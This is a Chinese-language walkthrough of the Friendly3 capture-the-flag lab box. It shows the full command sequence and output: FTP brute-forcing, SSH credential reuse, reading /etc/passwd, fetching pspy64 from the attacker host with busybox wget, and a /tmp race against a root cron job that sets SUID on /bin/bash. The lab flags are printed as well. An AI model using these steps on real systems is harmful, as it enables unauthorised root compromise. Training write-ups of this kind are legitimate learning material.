Friendly3
信息搜集
端口扫描
rustscan -a 172.20.10.5 -- -A
Open 172.20.10.5:21 Open 172.20.10.5:22 Open 172.20.10.5:80 PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 3.0.3 22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0) | ssh-hostkey: | 256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA= | 256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l 80/tcp open http syn-ack nginx 1.22.1 |_http-title: Welcome to nginx! |_http-server-header: nginx/1.22.1 | http-methods: |_ Supported Methods: GET HEAD Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
gobuster dir -u http://172.20.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png
没有扫到东西。
漏洞发现
踩点
Hi, sysadmin I want you to know that I've just uploaded the new files into the FTP Server. See you, juan.
爆破 FTP
查看一下 FTP,尝试匿名登录,我尝试了一下名字:
admin root ftp anonymous juan sysadmin juan.
都不行,尝试爆破 juan和sysadmin:
得到用户
juan alexis
查看:
┌──(kali
kali)-[~/temp/Friendly3] └─$ ftp 172.20.10.5 Connected to 172.20.10.5. 220 (vsFTPd 3.0.3) Name (172.20.10.5:kali): juan 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> pwd Remote directory: / ftp> ls -la 229 Entering Extended Passive Mode (|||51316|) 150 Here comes the directory listing. drwxr-xr-x 14 0 0 4096 Jun 25 2023 . drwxr-xr-x 14 0 0 4096 Jun 25 2023 .. -rw-r--r-- 1 0 0 0 Jun 25 2023 file1 -rw-r--r-- 1 0 0 0 Jun 25 2023 file10 -rw-r--r-- 1 0 0 0 Jun 25 2023 file100 -rw-r--r-- 1 0 0 0 Jun 25 2023 file11 -rw-r--r-- 1 0 0 0 Jun 25 2023 file12 -rw-r--r-- 1 0 0 0 Jun 25 2023 file13 -rw-r--r-- 1 0 0 0 Jun 25 2023 file14 -rw-r--r-- 1 0 0 0 Jun 25 2023 file15 -rw-r--r-- 1 0 0 0 Jun 25 2023 file16 -rw-r--r-- 1 0 0 0 Jun 25 2023 file17 -rw-r--r-- 1 0 0 0 Jun 25 2023 file18 -rw-r--r-- 1 0 0 0 Jun 25 2023 file19 -rw-r--r-- 1 0 0 0 Jun 25 2023 file2 -rw-r--r-- 1 0 0 0 Jun 25 2023 file20 -rw-r--r-- 1 0 0 0 Jun 25 2023 file21 -rw-r--r-- 1 0 0 0 Jun 25 2023 file22 -rw-r--r-- 1 0 0 0 Jun 25 2023 file23 -rw-r--r-- 1 0 0 0 Jun 25 2023 file24 -rw-r--r-- 1 0 0 0 Jun 25 2023 file25 -rw-r--r-- 1 0 0 0 Jun 25 2023 file26 -rw-r--r-- 1 0 0 0 Jun 25 2023 file27 -rw-r--r-- 1 0 0 0 Jun 25 2023 file28 -rw-r--r-- 1 0 0 0 Jun 25 2023 file29 -rw-r--r-- 1 0 0 0 Jun 25 2023 file3 -rw-r--r-- 1 0 0 0 Jun 25 2023 file30 -rw-r--r-- 1 0 0 0 Jun 25 2023 file31 -rw-r--r-- 1 0 0 0 Jun 25 2023 file32 -rw-r--r-- 1 0 0 0 Jun 25 2023 file33 -rw-r--r-- 1 0 0 0 Jun 25 2023 file34 -rw-r--r-- 1 0 0 0 Jun 25 2023 file35 -rw-r--r-- 1 0 0 0 Jun 25 2023 file36 -rw-r--r-- 1 0 0 0 Jun 25 2023 file37 -rw-r--r-- 1 0 0 0 Jun 25 2023 file38 -rw-r--r-- 1 0 0 0 Jun 25 2023 file39 -rw-r--r-- 1 0 0 0 Jun 25 2023 file4 -rw-r--r-- 1 0 0 0 Jun 25 2023 file40 -rw-r--r-- 1 0 0 0 Jun 25 2023 file41 -rw-r--r-- 1 0 0 0 Jun 25 2023 file42 -rw-r--r-- 1 0 0 0 Jun 25 2023 file43 -rw-r--r-- 1 0 0 0 Jun 25 2023 file44 -rw-r--r-- 1 0 0 0 Jun 25 2023 file45 -rw-r--r-- 1 0 0 0 Jun 25 2023 file46 -rw-r--r-- 1 0 0 0 Jun 25 2023 file47 -rw-r--r-- 1 0 0 0 Jun 25 2023 file48 -rw-r--r-- 1 0 0 0 Jun 25 2023 file49 -rw-r--r-- 1 0 0 0 Jun 25 2023 file5 -rw-r--r-- 1 0 0 0 Jun 25 2023 file50 -rw-r--r-- 1 0 0 0 Jun 25 2023 file51 -rw-r--r-- 1 0 0 0 Jun 25 2023 file52 -rw-r--r-- 1 0 0 0 Jun 25 2023 file53 -rw-r--r-- 1 0 0 0 Jun 25 2023 file54 -rw-r--r-- 1 0 0 0 Jun 25 2023 file55 -rw-r--r-- 1 0 0 0 Jun 25 2023 file56 -rw-r--r-- 1 0 0 0 Jun 25 2023 file57 -rw-r--r-- 1 0 0 0 Jun 25 2023 file58 -rw-r--r-- 1 0 0 0 Jun 25 2023 file59 -rw-r--r-- 1 0 0 0 Jun 25 2023 file6 -rw-r--r-- 1 0 0 0 Jun 25 2023 file60 -rw-r--r-- 1 0 0 0 Jun 25 2023 file61 -rw-r--r-- 1 0 0 0 Jun 25 2023 file62 -rw-r--r-- 1 0 0 0 Jun 25 2023 file63 -rw-r--r-- 1 0 0 0 Jun 25 2023 file64 -rw-r--r-- 1 0 0 0 Jun 25 2023 file65 -rw-r--r-- 1 0 0 0 Jun 25 2023 file66 -rw-r--r-- 1 0 0 0 Jun 25 2023 file67 -rw-r--r-- 1 0 0 0 Jun 25 2023 file68 -rw-r--r-- 1 0 0 0 Jun 25 2023 file69 -rw-r--r-- 1 0 0 0 Jun 25 2023 file7 -rw-r--r-- 1 0 0 0 Jun 25 2023 file70 -rw-r--r-- 1 0 0 0 Jun 25 2023 file71 -rw-r--r-- 1 0 0 0 Jun 25 2023 file72 -rw-r--r-- 1 0 0 0 Jun 25 2023 file73 -rw-r--r-- 1 0 0 0 Jun 25 2023 file74 -rw-r--r-- 1 0 0 0 Jun 25 2023 file75 -rw-r--r-- 1 0 0 0 Jun 25 2023 file76 -rw-r--r-- 1 0 0 0 Jun 25 2023 file77 -rw-r--r-- 1 0 0 0 Jun 25 2023 file78 -rw-r--r-- 1 0 0 0 Jun 25 2023 file79 -rw-r--r-- 1 0 0 0 Jun 25 2023 file8 -rw-r--r-- 1 0 0 36 Jun 25 2023 file80 -rw-r--r-- 1 0 0 0 Jun 25 2023 file81 -rw-r--r-- 1 0 0 0 Jun 25 2023 file82 -rw-r--r-- 1 0 0 0 Jun 25 2023 file83 -rw-r--r-- 1 0 0 0 Jun 25 2023 file84 -rw-r--r-- 1 0 0 0 Jun 25 2023 file85 -rw-r--r-- 1 0 0 0 Jun 25 2023 file86 -rw-r--r-- 1 0 0 0 Jun 25 2023 file87 -rw-r--r-- 1 0 0 0 Jun 25 2023 file88 -rw-r--r-- 1 0 0 0 Jun 25 2023 file89 -rw-r--r-- 1 0 0 0 Jun 25 2023 file9 -rw-r--r-- 1 0 0 0 Jun 25 2023 file90 -rw-r--r-- 1 0 0 0 Jun 25 2023 file91 -rw-r--r-- 1 0 0 0 Jun 25 2023 file92 -rw-r--r-- 1 0 0 0 Jun 25 2023 file93 -rw-r--r-- 1 0 0 0 Jun 25 2023 file94 -rw-r--r-- 1 0 0 0 Jun 25 2023 file95 -rw-r--r-- 1 0 0 0 Jun 25 2023 file96 -rw-r--r-- 1 0 0 0 Jun 25 2023 file97 -rw-r--r-- 1 0 0 0 Jun 25 2023 file98 -rw-r--r-- 1 0 0 0 Jun 25 2023 file99 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold10 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold11 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold12 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold13 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold14 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold15 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold4 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold5 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold6 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold7 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold8 drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold9 -rw-r--r-- 1 0 0 58 Jun 25 2023 fole32 226 Directory send OK. ftp> get file80 local: file80 remote: file80 229 Entering Extended Passive Mode (|||21632|) 150 Opening BINARY mode data connection for file80 (36 bytes). 100% |***********************************************************************************************************| 36 0.39 KiB/s 00:00 ETA 226 Transfer complete. 36 bytes received in 00:00 (0.38 KiB/s) ftp> get fole32 local: fole32 remote: fole32 229 Entering Extended Passive Mode (|||14269|) 150 Opening BINARY mode data connection for fole32 (58 bytes). 100% |***********************************************************************************************************| 58 92.09 KiB/s 00:00 ETA 226 Transfer complete. 58 bytes received in 00:00 (55.15 KiB/s) ftp> get fold10 local: fold10 remote: fold10 229 Entering Extended Passive Mode (|||46237|) 550 Failed to open file. ftp> cd fold10 250 Directory successfully changed. ftp> ls -la 229 Entering Extended Passive Mode (|||38694|) 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Jun 25 2023 . drwxr-xr-x 14 0 0 4096 Jun 25 2023 .. -rw-r--r-- 1 0 0 163 Jun 25 2023 .test.txt 226 Directory send OK. ftp> get .test.txt local: .test.txt remote: .test.txt 229 Entering Extended Passive Mode (|||45645|) 150 Opening BINARY mode data connection for .test.txt (163 bytes). 100% |***********************************************************************************************************| 163 1.78 KiB/s 00:00 ETA 226 Transfer complete. 163 bytes received in 00:00 (1.77 KiB/s) ftp> exit 221 Goodbye.
┌──(kalikali)-[~/temp/Friendly3] └─$ cat file80 Hi, I'm the sysadmin. I am bored... ┌──(kalikali)-[~/temp/Friendly3] └─$ cat fole32 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba ┌──(kalikali)-[~/temp/Friendly3] └─$ cat .test.txt Hi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...
什么玩意?暂时没啥用了,看来是,尝试 ssh 爆破,顺便试一下是否是相同密码:
看来不用爆破了,但是还是让他在后面跑吧,等下,出来辣:
提权
信息搜集
juan@friendly3:~$ ls -la total 28 drwxr-xr-x 3 juan juan 4096 Jul 17 2023 . drwxr-xr-x 4 root root 4096 Jun 25 2023 .. lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null -rw-r--r-- 1 juan juan 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 juan juan 3526 Apr 23 2023 .bashrc drwxr-xr-x 14 root root 4096 Jun 25 2023 ftp -rw-r--r-- 1 juan juan 807 Apr 23 2023 .profile -r-------- 1 juan juan 33 Jul 17 2023 user.txt juan@friendly3:~$ cat user.txt cb40b159c8086733d57280de3f97de30 juan@friendly3:~$ find . -name zlcnffjbeq.gkg 2>/dev/null juan@friendly3:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin ftp:x:100:108:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin juan:x:1001:1001::/home/juan:/bin/bash messagebus:x:101:109::/nonexistent:/usr/sbin/nologin sshd:x:102:65534::/run/sshd:/usr/sbin/nologin blue:x:1002:1002::/home/blue:/bin/bash juan@friendly3:~$ cd .. juan@friendly3:/home$ ls -la total 16 drwxr-xr-x 4 root root 4096 Jun 25 2023 . drwxr-xr-x 18 root root 4096 Jun 25 2023 .. drwxr-xr-x 2 blue blue 4096 Jun 25 2023 blue drwxr-xr-x 3 juan juan 4096 Jul 17 2023 juan juan@friendly3:/home$ cd blue juan@friendly3:/home/blue$ ls -la total 20 drwxr-xr-x 2 blue blue 4096 Jun 25 2023 . drwxr-xr-x 4 root root 4096 Jun 25 2023 .. lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null -rw-r--r-- 1 blue blue 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 blue blue 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 blue blue 807 Apr 23 2023 .profile juan@friendly3:/home/blue$ find / -name zlcnffjbeq.gkg 2>/dev/null juan@friendly3:/home/blue$ find / -user blue -name *.txt 2>/dev/null juan@friendly3:/home/blue$ find / -user juan -name *.txt 2>/dev/null /home/juan/user.txt juan@friendly3:/home/blue$ find / -user root -name *.txt 2>/dev/null /home/juan/ftp/fold8/passwd.txt /home/juan/ftp/fold10/.test.txt /home/juan/ftp/fold5/yt.txt /var/cache/dictionaries-common/ispell-dicts-list.txt /usr/share/vim/vim90/doc/help.txt /usr/share/doc/publicsuffix/examples/test_psl.txt /usr/share/doc/openssl/fingerprints.txt /usr/share/doc/openssl/HOWTO/keys.txt /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/logins.txt /usr/share/doc/libdb5.3/build_signature_amd64.txt /usr/share/doc/mount/mount.txt /usr/share/doc/util-linux/howto-debug.txt /usr/share/doc/util-linux/release-schedule.txt /usr/share/doc/util-linux/howto-man-page.txt /usr/share/doc/util-linux/col.txt /usr/share/doc/util-linux/pg.txt /usr/share/doc/util-linux/howto-tests.txt /usr/share/doc/util-linux/getopt.txt /usr/share/doc/util-linux/getopt_changelog.txt /usr/share/doc/util-linux/cal.txt /usr/share/doc/util-linux/hwclock.txt /usr/share/doc/util-linux/howto-build-sys.txt /usr/share/doc/util-linux/PAM-configuration.txt /usr/share/doc/util-linux/howto-compilation.txt /usr/share/doc/util-linux/mount.txt /usr/share/doc/util-linux/deprecated.txt /usr/share/doc/util-linux/modems-with-agetty.txt /usr/share/doc/util-linux/blkid.txt /usr/share/doc/util-linux/00-about-docs.txt /usr/share/doc/busybox/syslog.conf.txt juan@friendly3:/home/blue$ cat /home/juan/ftp/fold8/passwd.txt ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠛⠛⠿⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⡀⠠⠤⠒⢂⣉⣉⣉⣑⣒⣒⠒⠒⠒⠒⠒⠒⠒⠀⠀⠐⠒⠚⠻⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⡠⠔⠉⣀⠔⠒⠉⣀⣀⠀⠀⠀⣀⡀⠈⠉⠑⠒⠒⠒⠒⠒⠈⠉⠉⠉⠁⠂⠀⠈⠙⢿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠔⠁⠠⠖⠡⠔⠊⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠉⠲⢄⠀⠀⠀⠈⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠊⠀⢀⣀⣤⣤⣤⣤⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠜⠀⠀⠀⠀⣀⡀⠀⠈⠃⠀⠀⠀⠸⣿⣿⣿⣿ ⣿⣿⣿⣿⡿⠥⠐⠂⠀⠀⠀⠀⡄⠀⠰⢺⣿⣿⣿⣿⣿⣟⠀⠈⠐⢤⠀⠀⠀⠀⠀⠀⢀⣠⣶⣾⣯⠀⠀⠉⠂⠀⠠⠤⢄⣀⠙⢿⣿⣿ ⣿⡿⠋⠡⠐⠈⣉⠭⠤⠤⢄⡀⠈⠀⠈⠁⠉⠁⡠⠀⠀⠀⠉⠐⠠⠔⠀⠀⠀⠀⠀⠲⣿⠿⠛⠛⠓⠒⠂⠀⠀⠀⠀⠀⠀⠠⡉⢢⠙⣿ ⣿⠀⢀⠁⠀⠊⠀⠀⠀⠀⠀⠈⠁⠒⠂⠀⠒⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⢀⣀⡠⠔⠒⠒⠂⠀⠈⠀⡇⣿ ⣿⠀⢸⠀⠀⠀⢀⣀⡠⠋⠓⠤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠈⠢⠤⡀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⡠⠀⡇⣿ ⣿⡀⠘⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠈⠑⡦⢄⣀⠀⠀⠐⠒⠁⢸⠀⠀⠠⠒⠄⠀⠀⠀⠀⠀⢀⠇⠀⣀⡀⠀⠀⢀⢾⡆⠀⠈⡀⠎⣸⣿ ⣿⣿⣄⡈⠢⠀⠀⠀⠀⠘⣶⣄⡀⠀⠀⡇⠀⠀⠈⠉⠒⠢⡤⣀⡀⠀⠀⠀⠀⠀⠐⠦⠤⠒⠁⠀⠀⠀⠀⣀⢴⠁⠀⢷⠀⠀⠀⢰⣿⣿ ⣿⣿⣿⣿⣇⠂⠀⠀⠀⠀⠈⢂⠀⠈⠹⡧⣀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⢱⠒⠒⠒⠒⢖⠒⠒⠂⠙⠏⠀⠘⡀⠀⢸⠀⠀⠀⣿⣿⣿ ⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠑⠄⠰⠀⠀⠁⠐⠲⣤⣴⣄⡀⠀⠀⠀⠀⢸⠀⠀⠀⠀⢸⠀⠀⠀⠀⢠⠀⣠⣷⣶⣿⠀⠀⢰⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠁⢀⠀⠀⠀⠀⠀⡙⠋⠙⠓⠲⢤⣤⣷⣤⣤⣤⣤⣾⣦⣤⣤⣶⣿⣿⣿⣿⡟⢹⠀⠀⢸⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠑⠀⢄⠀⡰⠁⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠻⠋⠉⠛⢛⠉⠉⢹⠁⢀⢇⠎⠀⠀⢸⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠈⠢⢄⡉⠂⠄⡀⠀⠈⠒⠢⠄⠀⢀⣀⣀⣰⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⣎⠀⠼⠊⠀⠀⠀⠘⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠉⠢⢄⡈⠑⠢⢄⡀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⠀⠀⠀⠀⠀⢻⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⡈⠑⠢⢄⡀⠈⠑⠒⠤⠄⣀⣀⠀⠉⠉⠉⠉⠀⠀⠀⣀⡀⠤⠂⠁⠀⢀⠆⠀⠀⢸⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠁⠉⠒⠂⠤⠤⣀⣀⣉⡉⠉⠉⠉⠉⢀⣀⣀⡠⠤⠒⠈⠀⠀⠀⠀⣸⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣤⣤⣤⣤⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿ juan@friendly3:/home/blue$ cat /home/juan/ftp/fold5/yt.txt Thanks to all my YT subscribers!
借着信息搜集:
juan@friendly3:/home/blue$ sudo -l -bash: sudo: command not found juan@friendly3:/home/blue$ cd / juan@friendly3:/$ ls -la total 68 drwxr-xr-x 18 root root 4096 Jun 25 2023 . drwxr-xr-x 18 root root 4096 Jun 25 2023 .. lrwxrwxrwx 1 root root 7 Jun 25 2023 bin -> usr/bin drwxr-xr-x 3 root root 4096 Jun 25 2023 boot drwxr-xr-x 17 root root 3300 Apr 14 05:34 dev drwxr-xr-x 63 root root 4096 Apr 14 05:34 etc drwxr-xr-x 4 root root 4096 Jun 25 2023 home lrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img -> boot/initrd.img-6.1.0-9-amd64 lrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img.old -> boot/initrd.img-6.1.0-9-amd64 lrwxrwxrwx 1 root root 7 Jun 25 2023 lib -> usr/lib lrwxrwxrwx 1 root root 9 Jun 25 2023 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Jun 25 2023 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Jun 25 2023 libx32 -> usr/libx32 drwx------ 2 root root 16384 Jun 25 2023 lost+found drwxr-xr-x 3 root root 4096 Jun 25 2023 media drwxr-xr-x 2 root root 4096 Jun 25 2023 mnt drwxr-xr-x 2 root root 4096 Jun 25 2023 opt dr-xr-xr-x 140 root root 0 Apr 14 05:33 proc drwx------ 4 root root 4096 Jul 17 2023 root drwxr-xr-x 17 root root 540 Apr 14 06:04 run lrwxrwxrwx 1 root root 8 Jun 25 2023 sbin -> usr/sbin drwxr-xr-x 3 root root 4096 Jun 25 2023 srv dr-xr-xr-x 13 root root 0 Apr 14 05:33 sys drwxrwxrwt 7 root root 4096 Apr 14 06:09 tmp drwxr-xr-x 14 root root 4096 Jun 25 2023 usr drwxr-xr-x 12 root root 4096 Jun 25 2023 var lrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz -> boot/vmlinuz-6.1.0-9-amd64 lrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz.old -> boot/vmlinuz-6.1.0-9-amd64 juan@friendly3:/$ cat /etc/cron* cat: /etc/cron.d: Is a directory cat: /etc/cron.daily: Is a directory cat: /etc/cron.hourly: Is a directory cat: /etc/cron.monthly: Is a directory # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; } 47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; } 52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; } # cat: /etc/cron.weekly: Is a directory cat: /etc/cron.yearly: Is a directory juan@friendly3:/$ cd opt juan@friendly3:/opt$ ls -la total 12 drwxr-xr-x 2 root root 4096 Jun 25 2023 . drwxr-xr-x 18 root root 4096 Jun 25 2023 .. -rwxr-xr-x 1 root root 190 Jun 25 2023 check_for_install.sh juan@friendly3:/opt$ cat check_for_install.sh #!/bin/bash /usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash chmod +x /tmp/a.bash chmod +r /tmp/a.bash chmod +w /tmp/a.bash /bin/bash /tmp/a.bash rm -rf /tmp/a.bash juan@friendly3:/opt$ cd /tmp juan@friendly3:/tmp$ wget http://172.20.10.8:8888/pspy64 -bash: wget: command not found juan@friendly3:/tmp$ busybox wget http://172.20.10.8:8888/pspy64 Connecting to 172.20.10.8:8888 (172.20.10.8:8888) saving to 'pspy64' pspy64 100% |***********************************************************************| 4364k 0:00:00 ETA 'pspy64' saved juan@friendly3:/tmp$ chmod +x pspy64 juan@friendly3:/tmp$ ./pspy64
看到了一个疑似可以利用的脚本,传一个 pspy64 上去,看看是否是定时任务:
确实是定时任务,尝试见缝插针写个脚本利用一下:
#!/bin/sh while true: do echo "chmod + s /bin/bash" >> a.bash done
juan@friendly3:/tmp$ ./exp.sh ./exp.sh: line 1: 1:: command not found
what? 直接执行吧。。。。。
while true;do echo 'chmod +s /bin/bash' >> a.bash;done
拿到 shell!!
juan@friendly3:/tmp$ ls -l /bin/bash -rwxr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bash juan@friendly3:/tmp$ while true;do echo 'chmod +s /bin/bash' >> a.bash;done ^Cchmod +s /bin/bash juan@friendly3:/tmp$ ls -l /bin/bash -rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash juan@friendly3:/tmp$ bash -p bash-5.2# cd /root bash-5.2# ls -la total 40 drwx------ 4 root root 4096 Jul 17 2023 . drwxr-xr-x 18 root root 4096 Jun 25 2023 .. lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null -rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc -r-xr-xr-x 1 root root 509 Jun 25 2023 interfaces.sh -rw------- 1 root root 20 Jun 25 2023 .lesshst drwxr-xr-x 3 root root 4096 Jun 25 2023 .local -rw-r--r-- 1 root root 161 Jul 9 2019 .profile -r-------- 1 root root 33 Jul 17 2023 root.txt -rw-r--r-- 1 root root 66 Jun 25 2023 .selected_editor drwx------ 2 root root 4096 Jun 25 2023 .ssh bash-5.2# cat root.txt eb9748b67f25e6bd202e5fa25f534d51
